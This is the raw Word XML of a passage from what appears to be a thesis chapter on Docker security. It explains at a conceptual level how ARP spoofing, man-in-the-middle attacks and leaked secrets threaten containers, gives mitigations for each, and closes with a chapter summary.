      <w:r w:rsidR="00E245E9">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="002F42A1">
        <w:t xml:space="preserve">establish similarity </w:t>
      </w:r>
      <w:r w:rsidR="00F95FFA">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00C57B13">
        <w:t>many ways</w:t>
      </w:r>
      <w:r w:rsidR="00582832">
        <w:t xml:space="preserve"> to LAN </w:t>
      </w:r>
      <w:r w:rsidR="002C3703">
        <w:t>segments.</w:t>
      </w:r>
      <w:r w:rsidR="00C57B13">
        <w:t xml:space="preserve"> In this case, </w:t>
      </w:r>
      <w:r w:rsidR="00272C60">
        <w:t xml:space="preserve">containers can also be a victim of </w:t>
      </w:r>
      <w:r w:rsidR="00A923B5">
        <w:t xml:space="preserve">various </w:t>
      </w:r>
      <w:r w:rsidR="009C2F62">
        <w:t xml:space="preserve">ARP related </w:t>
      </w:r>
      <w:r w:rsidR="00C8658B">
        <w:t>threats.</w:t>
      </w:r>
      <w:r w:rsidR="00C739CB">
        <w:t xml:space="preserve"> As mentioned above, the </w:t>
      </w:r>
      <w:r w:rsidR="00745308">
        <w:t xml:space="preserve">virtual </w:t>
      </w:r>
      <w:r w:rsidR="00B30EFB">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00745308">
        <w:t xml:space="preserve">thernet bridge </w:t>
      </w:r>
      <w:r w:rsidR="00B30EFB">
        <w:t xml:space="preserve">forwards </w:t>
      </w:r>
      <w:r w:rsidR="00B97637">
        <w:t>incoming packets without implementing any filtering mechanism</w:t>
      </w:r>
      <w:r w:rsidR="004A21B0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00006F20">
        <w:t xml:space="preserve">exposing </w:t>
      </w:r>
      <w:r w:rsidR="00C84FBE">
        <w:t>containers more prone to ARP spoofing attack</w:t>
      </w:r>
      <w:r w:rsidR="00B008BB">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C84FBE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C37A5D">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="001D0BC3">
        <w:t>containers are</w:t>
      </w:r>
      <w:r w:rsidR="00C37A5D">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="001D0BC3">
        <w:t xml:space="preserve"> not immune to ARP spoofing attack</w:t>
      </w:r>
      <w:r w:rsidR="00466F74">
        <w:t>s</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="105324861"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F14DBB">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F14DBB">
            <w:instrText xml:space="preserve"> CITATION MKh20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00237A48">
            <w:instrText xml:space="preserve"> \m LLM20</w:instrText>
          </w:r>
          <w:r w:rsidR="003B7484">
            <w:instrText xml:space="preserve"> \m Doc21</w:instrText>
          </w:r>
          <w:r w:rsidR="00F14DBB">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[64, 65, 66]</w:t>
          </w:r>
          <w:r w:rsidR="00F14DBB">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00055C55">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B0BAC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A95314" w14:textId="2A1C01E8" w:rsidR="000C0982" w:rsidRDefault="000C0982" w:rsidP="00DA4F65">
      <w:r>
        <w:t xml:space="preserve">The result of this attack </w:t>
      </w:r>
      <w:r w:rsidR="006F5AFD">
        <w:t xml:space="preserve">can have </w:t>
      </w:r>
      <w:r w:rsidR="00FF3732">
        <w:t>profound</w:t>
      </w:r>
      <w:r w:rsidR="0017517C">
        <w:t xml:space="preserve"> implications </w:t>
      </w:r>
      <w:r w:rsidR="009A5BCE">
        <w:t>when an attacker gains access</w:t>
      </w:r>
      <w:r w:rsidR="00F20586">
        <w:t xml:space="preserve"> through a co</w:t>
      </w:r>
      <w:r w:rsidR="00920DC2">
        <w:t>mpromised container.</w:t>
      </w:r>
      <w:r w:rsidR="004A5F27">
        <w:t xml:space="preserve"> Usually, </w:t>
      </w:r>
      <w:r w:rsidR="00E96AF0">
        <w:t xml:space="preserve">attackers use </w:t>
      </w:r>
      <w:r w:rsidR="002641B4">
        <w:t>ARP spoofing technique to g</w:t>
      </w:r>
      <w:r w:rsidR="009638D8">
        <w:t xml:space="preserve">et valuable information </w:t>
      </w:r>
      <w:r w:rsidR="00143DCB">
        <w:t xml:space="preserve">of the traffic </w:t>
      </w:r>
      <w:r w:rsidR="007F1E09">
        <w:t>crossing the bridge</w:t>
      </w:r>
      <w:r w:rsidR="00DD48B6">
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidR="000F2CAA">
        <w:t>passwords and usernames</w:t>
      </w:r>
      <w:r w:rsidR="005D0F21">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD48B6">
        <w:t xml:space="preserve"> Further,</w:t>
      </w:r>
      <w:r w:rsidR="000F2CAA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002250B3">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00FF080B">
        <w:t xml:space="preserve">enables attackers to insert malicious </w:t>
      </w:r>
      <w:r w:rsidR="00F75E03">
        <w:t>programs to facil</w:t>
      </w:r>
      <w:r w:rsidR="00B2062E">
        <w:t>ita</w:t>
      </w:r>
      <w:r w:rsidR="00F75E03">
        <w:t xml:space="preserve">te other attacks, such as Dos, </w:t>
      </w:r>
      <w:r w:rsidR="00EC307D">
        <w:t>Man-in-the-middle (MITM), and session hijacking</w:t>
      </w:r>
      <w:r w:rsidR="00B2062E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FD5ECF">
        <w:t xml:space="preserve"> However, such an attack can be defended </w:t>
      </w:r>
      <w:r w:rsidR="00D60C0D">
        <w:t xml:space="preserve">by filtering the incoming traffics </w:t>
      </w:r>
      <w:r w:rsidR="00D705EE">
        <w:t xml:space="preserve">using access control </w:t>
      </w:r>
      <w:r w:rsidR="00B67CAB">
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidR="00BC3AC3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00585498">
        <w:t xml:space="preserve">configuring </w:t>
      </w:r>
      <w:r w:rsidR="009073A6">
        <w:t>a proper network</w:t>
      </w:r>
      <w:r w:rsidR="000B0AC1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00331D5B">
        <w:t xml:space="preserve"> More specifically, </w:t>
      </w:r>
      <w:r w:rsidR="00F27F33">
        <w:t xml:space="preserve">the MAC address of </w:t>
      </w:r>
      <w:r w:rsidR="00036159">
        <w:t xml:space="preserve">the legitimate </w:t>
      </w:r>
      <w:r w:rsidR="001360DB">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="003B20DB">
        <w:t>can be</w:t>
      </w:r>
      <w:r w:rsidR="00847439">
        <w:t xml:space="preserve"> isolated </w:t>
      </w:r>
      <w:r w:rsidR="003B20DB">
        <w:t xml:space="preserve">to prevent </w:t>
      </w:r>
      <w:r w:rsidR="00240D5C">
        <w:t>ARP spoofing attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="491058749"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008E56C5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008E56C5">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00394FC2">
            <w:instrText xml:space="preserve"> \m JNa20</w:instrText>
          </w:r>
          <w:r w:rsidR="008E56C5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51, 67]</w:t>
          </w:r>
          <w:r w:rsidR="008E56C5">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00240D5C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F153BFE" w14:textId="420595D0" w:rsidR="00503FAB" w:rsidRDefault="00E17C37" w:rsidP="00B87CD1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc87032904"/>
      <w:r>
        <w:t>Man-In-The</w:t>
      </w:r>
      <w:r w:rsidR="00B87CD1">
        <w:t>-Middle Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="6B511F81" w14:textId="65C40689" w:rsidR="00B87CD1" w:rsidRDefault="008A6F42" w:rsidP="00B87CD1">
      <w:r>
        <w:t>Man-In-The-Middle</w:t>
      </w:r>
      <w:r w:rsidR="00AF0263">
        <w:t xml:space="preserve"> (MITM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack is </w:t>
      </w:r>
      <w:r w:rsidR="0051181E">
        <w:t xml:space="preserve">when a malicious user </w:t>
      </w:r>
      <w:r w:rsidR="008632BE">
        <w:t>intercepts communication between two legi</w:t>
      </w:r>
      <w:r w:rsidR="000225C7">
        <w:t>timate participants to alter</w:t>
      </w:r>
      <w:r w:rsidR="00284969">
        <w:t xml:space="preserve"> or steal </w:t>
      </w:r>
      <w:r w:rsidR="00593A0A">
        <w:t>valuable information</w:t>
      </w:r>
      <w:r w:rsidR="00F90265">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC4BEF">
        <w:t xml:space="preserve"> Similarly, </w:t>
      </w:r>
      <w:r w:rsidR="00AD663E">
        <w:t xml:space="preserve">threat actors can use </w:t>
      </w:r>
      <w:r w:rsidR="00213750">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AD663E">
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r w:rsidR="00881BFC">
        <w:t xml:space="preserve">technique to </w:t>
      </w:r>
      <w:r w:rsidR="000173AC">
        <w:t xml:space="preserve">spy or steal </w:t>
      </w:r>
      <w:r w:rsidR="00593503">
        <w:t xml:space="preserve">traffic </w:t>
      </w:r>
      <w:r w:rsidR="00FE3D85">
        <w:t xml:space="preserve">information </w:t>
      </w:r>
      <w:r w:rsidR="00593503">
        <w:t>between two legitimate containers.</w:t>
      </w:r>
      <w:r w:rsidR="00080CD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0033246C">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00080CD5">
        <w:t>uch an attack can be defended by</w:t>
      </w:r>
      <w:r w:rsidR="0033246C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB60B8">
        <w:t xml:space="preserve">providing solid isolation </w:t>
      </w:r>
      <w:r w:rsidR="00D63E7B">
        <w:t>among containers</w:t>
      </w:r>
      <w:r w:rsidR="0069789A">
        <w:t xml:space="preserve"> with a secure and</w:t>
      </w:r>
      <w:r w:rsidR="004D1C09">
        <w:t xml:space="preserve"> proper network </w:t>
      </w:r>
      <w:r w:rsidR="000A2204">
        <w:t>settings</w:t>
      </w:r>
      <w:r w:rsidR="004D1C09">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003D49D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00455DCD">
        <w:t xml:space="preserve">Also, the communication </w:t>
      </w:r>
      <w:r w:rsidR="008E2192">
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidR="00E65CF2">
        <w:t xml:space="preserve"> among t</w:t>
      </w:r>
      <w:r w:rsidR="00123AD1">
        <w:t>he containers</w:t>
      </w:r>
      <w:r w:rsidR="008E2192">
        <w:t xml:space="preserve"> needs to be encrypted</w:t>
      </w:r>
      <w:r w:rsidR="00E65CF2">
        <w:t xml:space="preserve"> with TLS </w:t>
      </w:r>
      <w:r w:rsidR="0052217D">
        <w:t xml:space="preserve">to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00770C95">
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r w:rsidR="004E7402">
        <w:t>attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1782945654"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E44427">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E44427">
            <w:instrText xml:space="preserve"> CITATION TCo16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FC1665">
            <w:instrText xml:space="preserve"> \m NGe17</w:instrText>
          </w:r>
          <w:r w:rsidR="00E44427">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[46, 68]</w:t>
          </w:r>
          <w:r w:rsidR="00E44427">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004E7402">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D207DDC" w14:textId="0264C776" w:rsidR="00FA7361" w:rsidRDefault="000E17FB" w:rsidP="00BF06AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc87032905"/>
      <w:r>
        <w:t>Secret com</w:t>
      </w:r>
      <w:r w:rsidR="00BF06AC">
        <w:t>promises</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="6F449D15" w14:textId="51EA2640" w:rsidR="00BF06AC" w:rsidRDefault="00A537B7" w:rsidP="00BF06AC">
      <w:r>
        <w:t>A c</w:t>
      </w:r>
      <w:r w:rsidR="004824D5">
        <w:t xml:space="preserve">ontainer may </w:t>
      </w:r>
      <w:r w:rsidR="00222A03">
        <w:t>contain</w:t>
      </w:r>
      <w:r w:rsidR="0017746A">
        <w:t xml:space="preserve"> an application that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">needs </w:t>
      </w:r>
      <w:r w:rsidR="00975273">
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidR="00D5645E">
        <w:t>, such as a password</w:t>
      </w:r>
      <w:r w:rsidR="00975273">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F17799">
        <w:t>to access other services or the host.</w:t>
      </w:r>
      <w:r w:rsidR="001C5520">
        <w:t xml:space="preserve"> For instance, </w:t>
      </w:r>
      <w:r w:rsidR="0099428F">
        <w:t xml:space="preserve">a container is </w:t>
      </w:r>
      <w:r w:rsidR="00E55CFB">
        <w:t>running SSH</w:t>
      </w:r>
      <w:r w:rsidR="00812B72">
        <w:t xml:space="preserve"> and is</w:t>
      </w:r>
      <w:r w:rsidR="00E55CFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B277A6">
        <w:t xml:space="preserve">connected to another container that is </w:t>
      </w:r>
      <w:r w:rsidR="0037762F">
        <w:t>running a database application.</w:t>
      </w:r>
      <w:r w:rsidR="00812B72">
        <w:t xml:space="preserve"> In such a scenario, </w:t>
      </w:r>
      <w:r w:rsidR="007068A4">
        <w:t xml:space="preserve">if the </w:t>
      </w:r>
      <w:r w:rsidR="00EB48C0">
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidR="00D403E7">
        <w:t xml:space="preserve">key or </w:t>
      </w:r>
      <w:r w:rsidR="00900879">
        <w:t>password is compromised</w:t>
      </w:r>
      <w:r w:rsidR="00453C15">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001861AA">
        <w:t xml:space="preserve">an attacker </w:t>
      </w:r>
      <w:r w:rsidR="00453C15">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="0065320B">
        <w:t>jeopardi</w:t>
      </w:r>
      <w:r w:rsidR="00D906C2">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0065320B">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00754BE4">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00A316C5">
        <w:t xml:space="preserve">overall system and </w:t>
      </w:r>
      <w:r w:rsidR="00490B69">
        <w:t xml:space="preserve">steal </w:t>
      </w:r>
      <w:r w:rsidR="008B6A5C">
        <w:t xml:space="preserve">personal </w:t>
      </w:r>
      <w:r w:rsidR="007B51D5">
        <w:t>data.</w:t>
      </w:r>
      <w:r w:rsidR="009659BF">
        <w:t xml:space="preserve"> In Docker, </w:t>
      </w:r>
      <w:r w:rsidR="00857709">
        <w:t xml:space="preserve">a running container may </w:t>
      </w:r>
      <w:r w:rsidR="00F05E00">
        <w:t>share its</w:t>
      </w:r>
      <w:r w:rsidR="00C939D9">
        <w:t xml:space="preserve"> API keys and password to </w:t>
      </w:r>
      <w:r w:rsidR="00F21D5C">
        <w:t>run a service</w:t>
      </w:r>
      <w:r w:rsidR="00984269">
        <w:t xml:space="preserve">, and thus </w:t>
      </w:r>
      <w:r w:rsidR="00777ECB">
        <w:t xml:space="preserve">it is </w:t>
      </w:r>
      <w:r w:rsidR="00504E6A">
        <w:t xml:space="preserve">imperative </w:t>
      </w:r>
      <w:r w:rsidR="0051119B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="007E3F19">
        <w:t>keep these</w:t>
      </w:r>
      <w:r w:rsidR="00E343C6">
        <w:t xml:space="preserve"> secretes secured </w:t>
      </w:r>
      <w:r w:rsidR="008B38D4">
        <w:t xml:space="preserve">to protect </w:t>
      </w:r>
      <w:r w:rsidR="006A6444">
        <w:t>any security attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00AA4A76">
        <w:t xml:space="preserve"> In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00880C73">
        <w:t xml:space="preserve">it is not good practice to </w:t>
      </w:r>
      <w:r w:rsidR="0058229F">
        <w:t xml:space="preserve">build a Docker image </w:t>
      </w:r>
      <w:r w:rsidR="00880C73">
        <w:t>containing</w:t>
      </w:r>
      <w:r w:rsidR="0058229F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A45996">
        <w:t xml:space="preserve">sensitive </w:t>
      </w:r>
      <w:r w:rsidR="00D43920">
        <w:t xml:space="preserve">information using environment </w:t>
      </w:r>
      <w:r w:rsidR="00D43920">
        <w:lastRenderedPageBreak/>
        <w:t>variables</w:t>
      </w:r>
      <w:r w:rsidR="009E54F2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00171D70">
        <w:t xml:space="preserve"> It is also necessary to </w:t>
      </w:r>
      <w:r w:rsidR="0054654B">
        <w:t xml:space="preserve">maintain container files in read-only mode to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00C12EE4">
        <w:t>such attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="003716A7">
        <w:t>containers n</w:t>
      </w:r>
      <w:r w:rsidR="00D63C73">
        <w:t>eed to run with non-root access</w:t>
      </w:r>
      <w:r w:rsidR="00410120">
        <w:t xml:space="preserve"> unless required to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00EF4EF2">
        <w:t xml:space="preserve">privilege attacks and </w:t>
      </w:r>
      <w:r w:rsidR="006D7F56">
        <w:t xml:space="preserve">protect </w:t>
      </w:r>
      <w:r w:rsidR="008F7B35">
        <w:t>secret information</w:t>
      </w:r>
      <w:r w:rsidR="00C010CA">
        <w:t>, such as passwords and usernames</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="898862905"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005871B3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005871B3">
            <w:instrText xml:space="preserve"> CITATION SUp16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00900D17">
            <w:instrText xml:space="preserve"> \m OWA21</w:instrText>
          </w:r>
          <w:r w:rsidR="00952846">
            <w:instrText xml:space="preserve"> \m AMo15</w:instrText>
          </w:r>
          <w:r w:rsidR="005871B3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[57, 55, 69]</w:t>
          </w:r>
          <w:r w:rsidR="005871B3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C010CA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0B115" w14:textId="30F535A1" w:rsidR="00952846" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc87032906"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="584CACA6" w14:textId="35E556E6" w:rsidR="00E662C8" w:rsidRDefault="003517C4" w:rsidP="00E662C8">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00BF33BB">
        <w:t xml:space="preserve">is chapter </w:t>
      </w:r>
      <w:r w:rsidR="004A319A">
        <w:t>detailed</w:t>
      </w:r>
      <w:r w:rsidR="00983FD2">
        <w:t xml:space="preserve"> extensive </w:t>
      </w:r>
      <w:r w:rsidR="00E91A7B">
        <w:t xml:space="preserve">background </w:t>
      </w:r>
      <w:r w:rsidR="00983FD2">
        <w:t xml:space="preserve">research </w:t>
      </w:r>
      <w:r w:rsidR="007C639D">
        <w:t xml:space="preserve">in all areas </w:t>
      </w:r>
      <w:r w:rsidR="00E91A7B">
        <w:t xml:space="preserve">related to </w:t>
      </w:r>
      <w:r w:rsidR="007D3205">
        <w:t>Docker containeri</w:t>
      </w:r>
      <w:r w:rsidR="001751C2">
        <w:t xml:space="preserve">sation </w:t>
      </w:r>
      <w:r w:rsidR="00BF503F">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00A94827">
        <w:t>the development of this project.</w:t>
      </w:r>
      <w:r w:rsidR="00BB416D">
        <w:t xml:space="preserve"> The research highlight</w:t>
      </w:r>
      <w:r w:rsidR="009602EA">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00870D0A">
        <w:t xml:space="preserve"> the benefits of both virtualisation and </w:t>
      </w:r>
      <w:r w:rsidR="00C7789F">
        <w:t>containerisation</w:t>
      </w:r>
      <w:r w:rsidR="006F1C8C">
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="004E17F4">
        <w:t>n cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00AD1236">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006201A3">
        <w:t xml:space="preserve"> More specifically, th</w:t>
      </w:r>
      <w:r w:rsidR="00253666">
        <w:t xml:space="preserve">e author </w:t>
      </w:r>
      <w:r w:rsidR="000B0521">
        <w:t xml:space="preserve">has outlined </w:t>
      </w:r>
      <w:r w:rsidR="00F35F0B">
        <w:t>the architecture and components of Docker</w:t>
      </w:r>
      <w:r w:rsidR="003E1E5D">
        <w:t xml:space="preserve"> systems.</w:t>
      </w:r>
      <w:r w:rsidR="001B4C3A">
        <w:t xml:space="preserve"> The research also </w:t>
      </w:r>
      <w:r w:rsidR="008D04D6">
        <w:t>outlined</w:t>
      </w:r>
      <w:r w:rsidR="00DA0328">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E6AE1">
        <w:t xml:space="preserve">best security </w:t>
      </w:r>
      <w:r w:rsidR="000E2312">
        <w:t>measures</w:t>
      </w:r>
      <w:r w:rsidR="006E4666">
        <w:t xml:space="preserve"> and techniques</w:t>
      </w:r>
      <w:r w:rsidR="006E6AE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00836709">
        <w:t xml:space="preserve">to use Docker </w:t>
      </w:r>
      <w:r w:rsidR="00383418">
        <w:t>in production environment.</w:t>
      </w:r>
      <w:r w:rsidR="007336FE">
        <w:t xml:space="preserve"> Further</w:t>
      </w:r>
      <w:r w:rsidR="00ED6254">
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="00FF4D7C">
        <w:t xml:space="preserve"> research revealed </w:t>
      </w:r>
      <w:r w:rsidR="001E0CF1">
        <w:t xml:space="preserve">that Docker is </w:t>
      </w:r>
      <w:r w:rsidR="006E163F">
        <w:t>prone to some of the most c</w:t>
      </w:r>
      <w:r w:rsidR="0088567B">
        <w:t xml:space="preserve">ommon </w:t>
      </w:r>
      <w:r w:rsidR="005C3AB6">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DE7AC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F49DF">
        <w:t>and provided</w:t>
      </w:r>
      <w:r w:rsidR="000A1424">
        <w:t xml:space="preserve"> various</w:t>
      </w:r>
      <w:r w:rsidR="00DE7AC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089095B">
        <w:t>mitigation techniques</w:t>
      </w:r>
      <w:r w:rsidR="005C3AB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A437E3C" w14:textId="4966683B" w:rsidR="000260AA" w:rsidRPr="00E662C8" w:rsidRDefault="000260AA" w:rsidP="00E662C8">
      <w:r>
        <w:t xml:space="preserve">The next chapter will </w:t>
      </w:r>
      <w:r w:rsidR="00BB61AE">
        <w:t xml:space="preserve">cover a literature review </w:t>
      </w:r>
      <w:r w:rsidR="00AD6139">
        <w:t xml:space="preserve">of previous works related to </w:t>
      </w:r>
      <w:r w:rsidR="00EA00A4">
        <w:t>Docker security threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B00418F" w14:textId="77777777" w:rsidR="006850BF" w:rsidRPr="006850BF" w:rsidRDefault="006850BF" w:rsidP="006850BF"/>
    <w:p w14:paraId="6CD596DB" w14:textId="77777777" w:rsidR="00DA73D8" w:rsidRPr="00DA73D8" w:rsidRDefault="00DA73D8" w:rsidP="00DA73D8"/>
    <w:p w14:paraId="49690962" w14:textId="77777777" w:rsidR="001F1F71" w:rsidRDefault="001F1F71" w:rsidP="00DA4F65"/>
    <w:p w14:paraId="1A20E7D9" w14:textId="77777777" w:rsidR="00F03094" w:rsidRDefault="00F03094" w:rsidP="00DA4F65"/>
    <w:p w14:paraId="053D1C65" w14:textId="0022AA71" w:rsidR="00DA4F65" w:rsidRPr="00DA4F65" w:rsidRDefault="00DA4F65" w:rsidP="00DA4F65"/>
    <w:p w14:paraId="5C7B08E4" w14:textId="77777777" w:rsidR="00A74D34" w:rsidRDefault="00A74D34" w:rsidP="001351C8"/>
    <w:p w14:paraId="12C0EA38" w14:textId="77777777" w:rsidR="002E35B6" w:rsidRDefault="002E35B6" w:rsidP="001351C8"/>
    <w:p w14:paraId="715B14B9" w14:textId="77777777" w:rsidR="004C144B" w:rsidRPr="001351C8" w:rsidRDefault="004C144B" w:rsidP="001351C8"/>
    <w:p w14:paraId="75C64189" w14:textId="5CE0F011" w:rsidR="00961AAC" w:rsidRPr="00961AAC" w:rsidRDefault="00010B5D" w:rsidP="00961AAC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B82E80" w14:textId="77777777" w:rsidR="00C85FE5" w:rsidRDefault="00C85FE5" w:rsidP="00CB686E"/>
    <w:p w14:paraId="13BE04BA" w14:textId="2A8AD796" w:rsidR="0067687A" w:rsidRDefault="0067687A" w:rsidP="00CB686E"/>
    <w:p w14:paraId="2B7D6E0F" w14:textId="77777777" w:rsidR="002E2C92" w:rsidRPr="00A053F2" w:rsidRDefault="002E2C92" w:rsidP="00CB686E"/>
